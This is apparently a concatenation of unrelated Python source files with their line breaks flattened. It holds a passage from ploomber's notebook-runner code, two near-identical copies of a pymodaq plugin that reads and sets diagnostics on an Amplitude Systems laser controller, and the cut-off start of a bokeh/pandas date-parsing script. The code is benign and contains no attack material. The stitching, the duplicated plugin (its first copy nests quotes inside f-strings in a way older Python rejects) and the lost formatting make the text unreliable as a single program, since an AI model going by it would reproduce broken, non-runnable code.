str(primitive) elif isinstance(primitive, str): self._path = None self._primitive = primitive elif isinstance(primitive, Path): self._path = primitive if primitive.is_dir(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'Expected a file, got a directory.' + _suggest_ploomber_scaffold_is_dir()) if not primitive.exists(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'File does not exist.' + _suggest_ploomber_scaffold_missing_file()) self._primitive = _read_primitive(primitive) else: raise TypeError('Notebooks must be initialized from strings, ' 'Placeholder or pathlib.Path, got {}'.format( type(primitive))) static_analysis_vals = {'disable', 'regular', 'strict'} if static_analysis not in static_analysis_vals: raise ValueError(f'{static_analysis!r} is not a ' "valid 'static_analysis' value, choose one from: " f'{pretty_print.iterable(static_analysis_vals)}') self.static_analysis = static_analysis self._kernelspec_name = kernelspec_name self._hot_reload = hot_reload # TODO: validate ext_in values and extensions if self._path is None and hot_reload: raise ValueError('hot_reload only works in the notebook was ' 'loaded from a file') if self._path is not None and ext_in is None: self._ext_in = self._path.suffix[1:] elif self._path is None and ext_in is None: if Path(self._primitive).exists(): path = str(self._primitive) raise ValueError( f'The file {path!r} you passed looks like ' 'a path to a file. Perhaps you meant passing a ' 'pathlib.Path object? Example:\n\n' 'from pathlib import Path\n' f'NotebookRunner(Path({path!r}))') else: raise ValueError( '"ext_in" cannot be None if the notebook is ' 'initialized from a string. Either pass ' 'a pathlib.Path object with the notebook file ' 'location or pass the source code as string ' 'and include the "ext_in" parameter') elif self._path is not None and ext_in is not None: raise ValueError('"ext_in" must be None if notebook is ' 'initialized from a pathlib.Path object') elif self._path is None and ext_in is not None: self._ext_in = ext_in # try to determine language based on extension, though this test # might be inconclusive if dealing with a ipynb file, though we only # use this to determine the appropriate jupyter kernel when # initializing from a string, when initializing from files, the # extension is used to determine the kernel self._language = determine_language(self._ext_in) self._loc = None self._params = None self._nb_str_unrendered = None self._nb_obj_unrendered = None self._nb_str_rendered = None self._nb_obj_rendered = None # this will raise an error if kernelspec_name is invalid self._read_nb_str_unrendered() self._post_init_validation(str(self._primitive)) @property def primitive(self): if self._hot_reload: self._primitive = _read_primitive(self._path) return self._primitive def render(self, params): """Render notebook (fill parameters using papermill) """ self._params = json_serializable_params(params) self._render() def _render(self): # _read_nb_str_unrendered uses hot_reload, this ensures we always get # the latest version _, nb = self._read_nb_str_unrendered() if 'parameters' in _get_last_cell(nb).metadata.get('tags', []): cell_suggestion = _get_cell_suggestion(nb) kind = 'notebook' if self._ext_in == 'ipynb' else 'script' raise SourceInitializationError( f'Error processing {str(self._path)!r}: the last cell ' f'in the {kind} is the parameters cell. {cell_suggestion}') # this is needed for parameterize_notebook to work for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] nb.metadata['papermill'] = dict() # NOTE: we use parameterize_notebook instead of execute_notebook # with the prepare_only option because the latter adds a "papermill" # section on each cell's metadata, which makes it too verbose when # using NotebookRunner.develop() when the source is script (each cell # will have an empty "papermill" metadata dictionary) nb = parameterize_notebook(nb, self._params) # delete empty tags to prevent cluttering the notebooks for cell in nb.cells: if not len(cell.metadata['tags']): cell.metadata.pop('tags') self._nb_str_rendered = nbformat.writes(nb) self._post_render_validation() def _read_nb_str_unrendered(self): """ Returns the notebook representation (JSON string), this is the raw source code passed, does not contain injected parameters. Adds kernelspec info if not present based on the kernelspec_name, this metadata is required for papermill to know which kernel to use. An exception is raised if we cannot determine kernel information. """ # hot_reload causes to always re-evalaute the notebook representation if self._nb_str_unrendered is None or self._hot_reload: # this is the notebook node representation nb = _to_nb_obj( self.primitive, ext=self._ext_in, # passing the underscored version # because that's the only one available # when this is initialized language=self._language, kernelspec_name=self._kernelspec_name, check_if_kernel_installed=self._check_if_kernel_installed, path=self._path) # if the user injected cells manually (with ploomber nb --inject) # the source will contain the injected cell, remove it because # it should not be considered part of the source code self._nb_obj_unrendered = _cleanup_rendered_nb(nb, print_=False) # get the str representation. always write from nb_obj, even if # this was initialized with a ipynb file, nb_obj contains # kernelspec info self._nb_str_unrendered = nbformat.writes( self._nb_obj_unrendered, version=nbformat.NO_CONVERT) return self._nb_str_unrendered, self._nb_obj_unrendered def _post_init_validation(self, value): """ Validate notebook after initialization (run pyflakes to detect syntax errors) """ # NOTE: what happens if I pass source code with errors to parso? # maybe we don't need to use pyflakes after all # we can also use compile. can pyflakes detect things that # compile cannot? params_cell, _ = find_cell_with_tag(self._nb_obj_unrendered, 'parameters') if params_cell is None: loc = ' "{}"'.format(self.loc) if self.loc else '' msg = ('Notebook{} does not have a cell tagged ' '"parameters"'.format(loc)) if self.loc and Path(self.loc).suffix == '.py': msg += """. Add a cell at the top like this: # %% tags=["parameters"] upstream = None product = None Go to: https://ploomber.io/s/params for more information """ if self.loc and Path(self.loc).suffix == '.ipynb': msg += ('. Add a cell at the top and tag it as "parameters". ' 'Go to the next URL for ' 'details: https://ploomber.io/s/params') raise MissingParametersCellError(msg) def _post_render_validation(self): """ Validate params passed against parameters in the notebook """ # NOTE: maybe static_analysis = off should not turn off everything # but only warn # strict mode: raise and check signature # regular mode: _check_notebook called in NotebookRunner.run if self.static_analysis == 'strict': self._check_notebook(raise_=True, check_signature=True) else: # otherwise, only warn on unused parameters _warn_on_unused_params(self._nb_obj_unrendered, self._params) def _check_notebook(self, raise_, check_signature): if self.static_analysis and self.language == 'python': # warn if errors (e.g., undeclared variables, syntax errors) check_notebook(self._nb_str_to_obj(self._nb_str_rendered), self._params, filename=self._path or 'notebook', raise_=raise_, check_signature=check_signature) @property def doc(self): """ Returns notebook docstring parsed either from a triple quoted string in the top cell or a top markdown markdown cell """ return docstring.extract_from_nb(self._nb_obj_unrendered) @property def loc(self): return self._path @property def name(self): # filename without extension(e.g., plot.py -> plot) if self._path: return self._path.stem @property def nb_str_rendered(self): """ Returns the notebook (as a string) with parameters injected, hot reloadig if necessary """ if self._nb_str_rendered is None: raise RuntimeError('Attempted to get location for an unrendered ' 'notebook, render it first') if self._hot_reload: self._render() return self._nb_str_rendered @property def nb_obj_rendered(self): """ Returns the notebook (as an objet) with parameters injected, hot reloadig if necessary """ if self._nb_obj_rendered is None: # using self.nb_str_rendered triggers hot reload if needed self._nb_obj_rendered = self._nb_str_to_obj(self.nb_str_rendered) return self._nb_obj_rendered def __str__(self): # reload if empty or hot_reload=True self._read_nb_str_unrendered() # FIXME: this should ignore changes to the markdown cells return '\n'.join([c.source for c in self._nb_obj_unrendered.cells]) def __repr__(self): if self.loc is not None: return "{}('{}')".format(type(self).__name__, self.loc) else: return "{}(loaded from string)".format(type(self).__name__) @property def variables(self): raise NotImplementedError @property def extension(self): # this can be Python, R, Julia, etc. We are handling them the same, # for now, no normalization can be done. # One approach is to use the ext if loaded from file, otherwise None return None # FIXME: add this to the abstract class, probably get rid of "extension" # since it's not informative (ipynb files can be Python, R, etc) @property def language(self): """ Notebook Language (Python, R, etc), this is a best-effort property, can be None if we could not determine the language """ if self._language is None: self._read_nb_str_unrendered() try: # make sure you return "r" instead of "R" return (self._nb_obj_unrendered.metadata.kernelspec.language. lower()) except AttributeError: return None else: return self._language def _nb_str_to_obj(self, nb_str): return nbformat.reads(nb_str, as_version=nbformat.NO_CONVERT) def _get_parameters_cell(self): self._read_nb_str_unrendered() cell, _ = find_cell_with_tag(self._nb_obj_unrendered, tag='parameters') return cell.source def extract_upstream(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_upstream() def extract_product(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_product() @requires_path def save_injected_cell(self): """ Inject cell, overwrite the source file (and any paired files) """ fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # add metadata to flag that the cell was injected manually recursive_update( self.nb_obj_rendered, dict(metadata=dict(ploomber=dict(injected_manually=True)))) # Are we updating a text file that has a metadata filter? If so, # add ploomber as a section that must be stored if (self.nb_obj_rendered.metadata.get( 'jupytext', {}).get('notebook_metadata_filter') == '-all'): recursive_update( self.nb_obj_rendered, dict(metadata=dict(jupytext=dict( notebook_metadata_filter='ploomber,-all')))) # overwrite jupytext.write(self.nb_obj_rendered, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self.nb_obj_rendered, fmt_, self._path.stem): jupytext.write(self.nb_obj_rendered, fp=path, fmt=fmt_) @requires_path def remove_injected_cell(self): """ Delete injected cell, overwrite the source file (and any paired files) """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) # remove metadata recursive_update( nb_clean, dict(metadata=dict(ploomber=dict(injected_manually=None)))) fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # overwrite jupytext.write(nb_clean, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self._nb_obj_unrendered, fmt_, self._path.stem): jupytext.write(nb_clean, fp=path, fmt=fmt_) @requires_path def format(self, fmt, entry_point): """Change source format Returns ------- str The path if the extension changed, None otherwise """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) ext_file = self._path.suffix ext_format = long_form_one_format(fmt)['extension'] extension_changed = ext_file != ext_format if extension_changed: if Path(entry_point).is_file(): path = self._path.with_suffix(ext_format) Path(self._path).unlink() modified_entry = Path(entry_point).read_text() main_file = f'{self.name}{ext_file}' if main_file in modified_entry: modified_entry = modified_entry.replace( main_file, f'{self.name}{ext_format}') Path(entry_point).write_text(modified_entry) else: click.secho( f'{main_file} does not appear in entry-point' f'please edit manually\n', fg='yellow') path = self._path else: click.secho( "The entry-point is not a valid file, please" " update the pipeline file extensions manually\n", fg='yellow') path = self._path else: path = self._path jupytext.write(nb_clean, path, fmt=fmt) return path if extension_changed else None @requires_path def pair(self, base_path): """Pairs with an ipynb file """ # TODO: add unit test if self._ext_in == 'ipynb': raise ValueError( 'pairing only works with .py files, got .ipynb. ' 'Yoy may convert the .ipynb to .py and try again.') fmt, _ = jupytext.guess_format(self._primitive, f'.{self._ext_in}') fmt_ = f'{self._ext_in}:{fmt}' # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=[ '--set-formats', f'{base_path}//ipynb,{fmt_}', str(self._path) ]) @requires_path def sync(self): """Pairs with and ipynb file """ # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=['--sync', str(self._path)]) def json_serializable_params(params): # papermill only allows JSON serializable parameters # convert Params object to dict params = params.to_dict() params['product'] = params['product'].to_json_serializable() if params.get('upstream'): params['upstream'] = params['upstream'].to_json_serializable() return params def _to_nb_obj(source, language, ext=None, kernelspec_name=None, check_if_kernel_installed=True, path=None): """ Convert to jupyter notebook via jupytext, if the notebook does not contain kernel information and the user did not pass a kernelspec_name explicitly, we will try to infer the language and select a kernel appropriately. If a valid kernel is found, it is added to the notebook. If none of this works, an exception is raised. If also converts the code string to its notebook node representation, adding kernel data accordingly. Parameters ---------- source : str Jupyter notebook (or jupytext compatible formatted) document language : str Programming language path : str, default=None Script/notebook path. If not None, it's used to throw an informative error if the notebook fails to load Returns ------- nb Notebook object Raises ------ RenderError If the notebook has no kernelspec metadata and kernelspec_name is None. A notebook without kernelspec metadata will not display in jupyter notebook correctly. We have to make sure all notebooks have this. """ import jupytext # let jupytext figure out the format try: nb = jupytext.reads(source, fmt=ext) except Exception as e: what = 'notebook' if ext == 'ipynb' else 'script' err = f'Failed to read {what}' if path is not None: err += f' from {str(path)!r}' raise SourceInitializationError(err) from e # NOTE: I can add the cell with parameters here, but what happens if # extract_upstream is false? would that be a problem? check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=check_if_kernel_installed) return nb def check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=True): """Make sure the passed notebook has kernel info Parameters ---------- check_if_installed : bool Also check if the kernelspec is installed, nb.metadata.kernelspec to be replaced by whatever information jupyter returns when requesting the kernelspec """ import jupyter_client kernel_name = determine_kernel_name(nb, kernelspec_name, ext, language) # cannot keep going if we don't have the kernel name if kernel_name is None: raise SourceInitializationError( 'Notebook does not contain kernelspec metadata and ' 'kernelspec_name was not specified, either add ' 'kernelspec info to your source file or specify ' 'a kernelspec by name. To see list of installed kernels run ' '"jupyter kernelspec list" in the terminal (first column ' 'indicates the name). Python is usually named "python3", ' 'R usually "ir"') if check_if_installed: kernelspec = jupyter_client.kernelspec.get_kernel_spec(kernel_name) nb.metadata.kernelspec = { "display_name": kernelspec.display_name, "language": kernelspec.language, "name": kernel_name } else: if 'metadata' not in nb: nb['metadata'] = dict() if 'kernelspec' not in nb['metadata']: nb['metadata']['kernelspec'] = dict() # we cannot ask jupyter, so we fill this in ourselves nb.metadata.kernelspec = { "display_name": 'R' if kernel_name == 'ir' else 'Python 3', "language": 'R' if kernel_name == 'ir' else 'python', "name": kernel_name } def determine_kernel_name(nb, kernelspec_name, ext, language): """ Determines the kernel name by using the following data (returns whatever gives kernel info first): 1) explicit kernel from the user 2) notebook's metadata 3) file extension 4) language 5) best guess """ # explicit kernelspec name if kernelspec_name is not None: return kernelspec_name # use metadata info try: return nb.metadata.kernelspec.name except AttributeError: pass # use language from extension if passed, otherwise use language variable if ext: language = determine_language(ext) lang2kernel = {'python': 'python3', 'r': 'ir'} if language in lang2kernel: return lang2kernel[language] # nothing worked, try to guess if it's python... is_python_ = is_python(nb) if is_python_: return 'python3' else: return None def inject_cell(model, params): """Inject params (by adding a new cell) to a model Notes ----- A model is different than a notebook: https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html """ nb = nbformat.from_dict(model['content']) # we must ensure nb has kernelspec info, otherwise papermill will fail to # parametrize ext = model['name'].split('.')[-1] check_nb_kernelspec_info(nb, kernelspec_name=None, ext=ext, language=None) # papermill adds a bunch of things before calling parameterize_notebook # if we don't add those things, parameterize_notebook breaks # https://github.com/nteract/papermill/blob/0532d499e13e93d8990211be33e9593f1bffbe6c/papermill/iorw.py#L400 if not hasattr(nb.metadata, 'papermill'): nb.metadata['papermill'] = { 'parameters': dict(), 'environment_variables': dict(), 'version': None, } for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] params = json_serializable_params(params) comment = ('This cell was injected automatically based on your stated ' 'upstream dependencies (cell above) and pipeline.yaml ' 'preferences. It is temporary and will be removed when you ' 'save this notebook') model['content'] = parameterize_notebook(nb, params, report_mode=False, comment=comment) def _cleanup_rendered_nb(nb, print_=True): """ Cleans up a rendered notebook object. Removes cells with tags: injected-parameters, debugging-settings, and metadata injected by papermill """ out = find_cell_with_tags(nb, ['injected-parameters', 'debugging-settings']) if print_: for key in out.keys(): print(f'Removing {key} cell...') idxs = set(cell['index'] for cell in out.values()) nb['cells'] = [ cell for idx, cell in enumerate(nb['cells']) if idx not in idxs ] # papermill adds "tags" to all cells that don't have them, remove them # if they are empty to avoid cluttering the script for cell in nb['cells']: if 'tags' in cell.get('metadata', {}): if not len(cell['metadata']['tags']): del cell['metadata']['tags'] return nb def is_python(nb): """ Determine if the notebook is Python code for a given notebook object, look for metadata.kernelspec.language first, if not defined, try to guess if it's Python, it's conservative and it returns False if the code is valid Python but contains (<-), in which case it's much more likely to be R """ is_python_ = None # check metadata first try: language = nb.metadata.kernelspec.language except AttributeError: pass else: is_python_ = language == 'python' # no language defined in metadata, check if it's valid python if is_python_ is None: code_str = '\n'.join([c.source for c in nb.cells]) try: ast.parse(code_str) except SyntaxError: is_python_ = False else: # there is a lot of R code which is also valid Python code! So # let's # run a quick test. It is very unlikely to have "<-" in Python ( # {less than} {negative} but extremely common {assignment} if '<-' not in code_str: is_python_ = True # inconclusive test... if is_python_ is None: is_python_ = False return is_python_ def determine_language(extension): """ A function to determine programming language given file extension, returns programming language name (all lowercase) if could be determined, None if the test is inconclusive """ if extension.startswith('.'): extension = extension[1:] mapping = {'py': 'python', 'r': 'r', 'R': 'r', 'Rmd': 'r', 'rmd': 'r'} # ipynb can be many languages, it must return None return mapping.get(extension) def recursive_update(target, update): """Recursively update a dictionary. Taken from jupytext.header """ for key in update: value = update[key] if value is None: # remove if it exists target.pop(key, None) elif isinstance(value, dict): target[key] = recursive_update(target.get(key, {}), value) else: target[key] = value return target def parse_jupytext_format(fmt, name): """ Parse a jupytext format string (such as notebooks//ipynb) and return the path to the file and the extension """ fmt_parsed = long_form_one_format(fmt) path = Path(fmt_parsed['prefix'], f'{name}{fmt_parsed["extension"]}') del fmt_parsed['prefix'] return path, short_form_one_format(fmt_parsed) def iter_paired_notebooks(nb, fmt_, name): formats = nb.metadata.get('jupytext', {}).get('formats', '') if not formats: return formats = formats.split(',') formats.remove(fmt_) # overwrite all paired files for path, fmt_current in (parse_jupytext_format(fmt, name) for fmt in formats): yield path, fmt_current def _nb2codestr(nb): return '\n'.join([c.source for c in nb.cells if c.cell_type == 'code']) def _warn_on_unused_params(nb, params): nb = deepcopy(nb) _, idx = find_cell_with_tag(nb, 'parameters') del nb.cells[idx] code = _nb2codestr(nb) # NOTE: if there a syntax error we cannot accurately check this m = parso.parse(code) names = set(m.get_used_names()) # remove product since it may not be required # FIXME: maybe only remove it if it's a dictionary with >2 keys unused = set(params) - names - {'product'} if unused: warnings.warn('These parameters are not used in the ' f'task\'s source code: {pretty_print.iterable(unused)}') def add_parameters_cell(path, extract_upstream, extract_product): """ Add parameters cell to a script/notebook in the given path, overwrites the original file """ source = '' if extract_upstream: source += """\ # declare a list tasks whose products you want to use as inputs upstream = None """ if extract_product: source += """\ # declare a dictionary with the outputs of this task product = None """ c = JupytextConfiguration() c.notebook_metadata_filter c.cell_metadata_filter = 'all' nb = jupytext.read(path) new_cell = nbformat.v4.new_code_cell(source, metadata={'tags': ['parameters']}) nb.cells.insert(0, new_cell) jupytext.write(nb, path, config=c) def _suggest_ploomber_scaffold_missing_file(): if Path('pipeline.yaml').is_file(): return '\nTo create it, run: ploomber scaffold' else: return '' def _suggest_ploomber_scaffold_is_dir(): if Path('pipeline.yaml').is_file(): return ('\nTo create it, delete the directory, ' 'then run: ploomber scaffold') else: return ''
# -*- coding: utf-8 -*- """ Created on Thu Jun 14 15:14:54 2018 @author: Weber Sébastien @email: seba.weber@gmail.com """ from PyQt5.QtCore import pyqtSignal, QTimer, QThread from easydict import EasyDict as edict from pymodaq.daq_utils.daq_utils import ThreadCommand, getLineInfo, DataFromPlugins, set_logger, get_module_name from pymodaq.daq_viewer.utility_classes import DAQ_Viewer_base, comon_parameters import numpy as np from ...hardware.amplitude.amplitude_systems import AmplitudeSystemsCRC16 logger = set_logger(get_module_name(__file__)) #%% class DAQ_0DViewer_AmplitudeSystemsCRC16(DAQ_Viewer_base): """ diagnostics = [ dict(id=0, name='Frequency PP', read_command=0x30, write_command=0x30, reply=4, unit='kHz', divider=1000, readonly=False, value=-1), """ data_grabed_signal = pyqtSignal(list) params = comon_parameters+[ {'title': 'COM port:','name': 'com_port', 'type': 'list', 'values': AmplitudeSystemsCRC16.get_ressources()}, {'title': 'Timeout:', 'name': 'timeout', 'type': 'int', 'value': -1}, {'title': 'Serial number:', 'name': 'serial_number', 'type': 'int', 'value': 0}, {'title': 'Version:', 'name': 'version', 'type': 'str', 'value': ''}, {'title': 'Update all Diags', 'name': 'update_diags', 'type': 'bool_push'}, {'title': 'Startup:', 'name': 'startup', 'type': 'group', 'children': [ {'title': 'Laser:', 'name': 'laser', 'type': 'bool_push', 'value': False}, {'title': 'Shutter:', 'name': 'shutter', 'type': 'bool_push', 'value': False}, ]}, {'title': 'Channels:', 'name': 'channels', 'type': 'itemselect', 'height': 150, 'value': dict(all_items=[diag['name'] for diag in AmplitudeSystemsCRC16.diagnostics], selected=[])}, {'title': 'Status:', 'name': 'status', 'type': 'group', 'children': [{'title': stat['name'], 'name': f'stat_{stat['id']}', 'type': 'led', 'value':bool(stat['value']), 'readonly': True} for stat in AmplitudeSystemsCRC16.status]}, {'title': 'Diagnostics:', 'name': 'diagnostics', 'type': 'group', 'children': [{'title': f'{diag['name']} ({diag['unit']})', 'name': f'diag_{diag['id']}', 'type': 'float', 'value':diag['value'], 'readonly': diag['readonly']} for diag in AmplitudeSystemsCRC16.diagnostics]} ] def __init__(self,parent=None,params_state=None): super().__init__(parent, params_state) self.controller = None def ini_detector(self, controller=None): """ Initialisation procedure of the detector. Returns ------- The initialized status. See Also -------- daq_utils.ThreadCommand """ self.status.update(edict(initialized=False, info="", x_axis=None, y_axis=None, controller=None)) try: if self.settings.child(('controller_status')).value() == "Slave": if controller is None: raise Exception('no controller has been defined externally while this detector is a slave one') else: self.controller = controller else: self.controller = AmplitudeSystemsCRC16() self.controller.init_communication(self.settings.child(('com_port')).value()) self.settings.child(('timeout')).setValue(self.controller.timeout) try: self.settings.child(('serial_number')).setValue(self.controller.get_sn()) QThread.msleep(200) except Exception as e: logger.exception(str(e)) try: self.settings.child(('version')).setValue(self.controller.get_version()) QThread.msleep(200) except Exception as e: logger.exception(str(e)) self.update_status() for stat in self.controller.status: self.settings.child('status', f'stat_{stat['id']}').setValue(stat['value']) self.update_all_diags() self.status_timer = QTimer() self.status_timer.timeout.connect(self.update_status) self.status_timer.start(1000) self.status.controller = self.controller self.status.initialized = True return self.status except Exception as e: self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log'])) self.status.info = getLineInfo() + str(e) self.status.initialized = False return self.status def update_status(self): """ get a list of changed status dict on the form dict(id=0, name='Temp Amp', value=0, byte=0, bit=0x00) """ try: for stat in self.controller.get_status(): self.settings.child('status', f'stat_{stat['id']}').setValue(bool(stat['value'])) self.settings.child('startup', 'laser').setValue(self.controller.get_laser()) self.settings.child('startup', 'shutter').setValue(self.controller.get_shutter()) except Exception as e: logger.exception(str(e)) def update_all_diags(self): for diag in self.controller.diagnostics: try: QThread.msleep(200) self.update_diag(diag['id']) except Exception as e: print(e) def update_diag(self, id): data, diag = self.controller.get_diag_from_id(id) self.settings.child('diagnostics', f'diag_{id}').setValue(diag['value'] / diag['divider']) def reset(self): self.controller.flush() def grab_data(self, Naverage=1, **kwargs): """ """ self.status_timer.stop() data_tot = [] selected_channels = self.settings.child(('channels')).value()['selected'] for channel in selected_channels: data, diag = self.controller.get_diag_from_name(channel) data = int.from_bytes(data, 'big') / diag['divider'] self.settings.child('diagnostics', f'diag_{diag['id']}').setValue(data) data_tot.append(np.array([data])) QThread.msleep(200) self.data_grabed_signal.emit( [DataFromPlugins(name='AmplitudeSystems', data=data_tot, dim='Data0D', labels=selected_channels)]) self.status_timer.start(1000) def stop(self): pass def commit_settings(self, param): """ Activate the parameters changes in the hardware. =============== ================================= ============================ **Parameters** **Type** **Description** *param* instance of pyqtgraph.parameter The parameter to be checked. =============== ================================= ============================ See Also -------- daq_utils.ThreadCommand """ try: self.status_timer.stop() if 'diag_' in param.name(): id = int(param.name().split('diag_')[1]) diag = self.controller.get_diag_from_id(id) self.controller.set_diag(id, int(param.value() * diag['divider']).to_bytes(diag['reply'], 'big')) QThread.msleep(200) self.update_diag(id) elif param.name() == 'timeout': self.controller.timeout = param.value() param.setValue(self.controller.timeout) elif param.name() == 'update_diags': self.update_all_diags() self.update_status() elif param.name() == 'laser': self.controller.set_laser(param.value()) elif param.name() == 'shutter': self.controller.set_shutter(param.value()) self.status_timer.start(1000) except Exception as e: self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log'])) def close(self): """ close the current instance of the visa session. """ self.status_timer.stop() QThread.msleep(1000) self.controller.close_communication()
# -*- coding: utf-8 -*- """ Created on Thu Jun 14 15:14:54 2018 @author: Weber Sébastien @email: seba.weber@gmail.com """ from PyQt5.QtCore import pyqtSignal, QTimer, QThread from easydict import EasyDict as edict from pymodaq.daq_utils.daq_utils import ThreadCommand, getLineInfo, DataFromPlugins, set_logger, get_module_name from pymodaq.daq_viewer.utility_classes import DAQ_Viewer_base, comon_parameters import numpy as np from ...hardware.amplitude.amplitude_systems import AmplitudeSystemsCRC16 logger = set_logger(get_module_name(__file__)) #%% class DAQ_0DViewer_AmplitudeSystemsCRC16(DAQ_Viewer_base): """ diagnostics = [ dict(id=0, name='Frequency PP', read_command=0x30, write_command=0x30, reply=4, unit='kHz', divider=1000, readonly=False, value=-1), """ data_grabed_signal = pyqtSignal(list) params = comon_parameters+[ {'title': 'COM port:','name': 'com_port', 'type': 'list', 'values': AmplitudeSystemsCRC16.get_ressources()}, {'title': 'Timeout:', 'name': 'timeout', 'type': 'int', 'value': -1}, {'title': 'Serial number:', 'name': 'serial_number', 'type': 'int', 'value': 0}, {'title': 'Version:', 'name': 'version', 'type': 'str', 'value': ''}, {'title': 'Update all Diags', 'name': 'update_diags', 'type': 'bool_push'}, {'title': 'Startup:', 'name': 'startup', 'type': 'group', 'children': [ {'title': 'Laser:', 'name': 'laser', 'type': 'bool_push', 'value': False}, {'title': 'Shutter:', 'name': 'shutter', 'type': 'bool_push', 'value': False}, ]}, {'title': 'Channels:', 'name': 'channels', 'type': 'itemselect', 'height': 150, 'value': dict(all_items=[diag['name'] for diag in AmplitudeSystemsCRC16.diagnostics], selected=[])}, {'title': 'Status:', 'name': 'status', 'type': 'group', 'children': [{'title': stat['name'], 'name': f'stat_{stat["id"]}', 'type': 'led', 'value':bool(stat['value']), 'readonly': True} for stat in AmplitudeSystemsCRC16.status]}, {'title': 'Diagnostics:', 'name': 'diagnostics', 'type': 'group', 'children': [{'title': f'{diag["name"]} ({diag["unit"]})', 'name': f'diag_{diag["id"]}', 'type': 'float', 'value':diag['value'], 'readonly': diag['readonly']} for diag in AmplitudeSystemsCRC16.diagnostics]} ] def __init__(self,parent=None,params_state=None): super().__init__(parent, params_state) self.controller = None def ini_detector(self, controller=None): """ Initialisation procedure of the detector. Returns ------- The initialized status. See Also -------- daq_utils.ThreadCommand """ self.status.update(edict(initialized=False, info="", x_axis=None, y_axis=None, controller=None)) try: if self.settings.child(('controller_status')).value() == "Slave": if controller is None: raise Exception('no controller has been defined externally while this detector is a slave one') else: self.controller = controller else: self.controller = AmplitudeSystemsCRC16() self.controller.init_communication(self.settings.child(('com_port')).value()) self.settings.child(('timeout')).setValue(self.controller.timeout) try: self.settings.child(('serial_number')).setValue(self.controller.get_sn()) QThread.msleep(200) except Exception as e: logger.exception(str(e)) try: self.settings.child(('version')).setValue(self.controller.get_version()) QThread.msleep(200) except Exception as e: logger.exception(str(e)) self.update_status() for stat in self.controller.status: self.settings.child('status', f'stat_{stat["id"]}').setValue(stat['value']) self.update_all_diags() self.status_timer = QTimer() self.status_timer.timeout.connect(self.update_status) self.status_timer.start(1000) self.status.controller = self.controller self.status.initialized = True return self.status except Exception as e: self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log'])) self.status.info = getLineInfo() + str(e) self.status.initialized = False return self.status def update_status(self): """ get a list of changed status dict on the form dict(id=0, name='Temp Amp', value=0, byte=0, bit=0x00) """ try: for stat in self.controller.get_status(): self.settings.child('status', f'stat_{stat["id"]}').setValue(bool(stat['value'])) self.settings.child('startup', 'laser').setValue(self.controller.get_laser()) self.settings.child('startup', 'shutter').setValue(self.controller.get_shutter()) except Exception as e: logger.exception(str(e)) def update_all_diags(self): for diag in self.controller.diagnostics: try: QThread.msleep(200) self.update_diag(diag['id']) except Exception as e: print(e) def update_diag(self, id): data, diag = self.controller.get_diag_from_id(id) self.settings.child('diagnostics', f'diag_{id}').setValue(diag['value'] / diag['divider']) def reset(self): self.controller.flush() def grab_data(self, Naverage=1, **kwargs): """ """ self.status_timer.stop() data_tot = [] selected_channels = self.settings.child(('channels')).value()['selected'] for channel in selected_channels: data, diag = self.controller.get_diag_from_name(channel) data = int.from_bytes(data, 'big') / diag['divider'] self.settings.child('diagnostics', f'diag_{diag["id"]}').setValue(data) data_tot.append(np.array([data])) QThread.msleep(200) self.data_grabed_signal.emit( [DataFromPlugins(name='AmplitudeSystems', data=data_tot, dim='Data0D', labels=selected_channels)]) self.status_timer.start(1000) def stop(self): pass def commit_settings(self, param): """ Activate the parameters changes in the hardware. =============== ================================= ============================ **Parameters** **Type** **Description** *param* instance of pyqtgraph.parameter The parameter to be checked. =============== ================================= ============================ See Also -------- daq_utils.ThreadCommand """ try: self.status_timer.stop() if 'diag_' in param.name(): id = int(param.name().split('diag_')[1]) diag = self.controller.get_diag_from_id(id) self.controller.set_diag(id, int(param.value() * diag['divider']).to_bytes(diag['reply'], 'big')) QThread.msleep(200) self.update_diag(id) elif param.name() == 'timeout': self.controller.timeout = param.value() param.setValue(self.controller.timeout) elif param.name() == 'update_diags': self.update_all_diags() self.update_status() elif param.name() == 'laser': self.controller.set_laser(param.value()) elif param.name() == 'shutter': self.controller.set_shutter(param.value()) self.status_timer.start(1000) except Exception as e: self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log'])) def close(self): """ close the current instance of the visa session. """ self.status_timer.stop() QThread.msleep(1000) self.controller.close_communication()
import datetime import json import re import time from pathlib import Path import numpy as np import pandas as pd from bokeh.io import reset_output from bokeh.layouts import column, widgetbox from bokeh.models import HoverTool, PointDrawTool, Span from bokeh.models.widgets import DataTable, TableColumn from bokeh.plotting import ColumnDataSource, figure, output_file, show from bs4 import BeautifulSoup from contextlib import suppress from tkinter import messagebox import niq_classes def convert_to_datetime(dt_string): """ Converts Date/Time cell from master DataFrame to datetime.datetime object. Args: dt_string (str): contents of date/time cell of input file provided by user """ # Return input if already datetime object if type(dt_string) == pd._libs.tslibs.timestamps.Timestamp: return dt_string # Try extracting date/time with various formats while True: with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M") break dt = 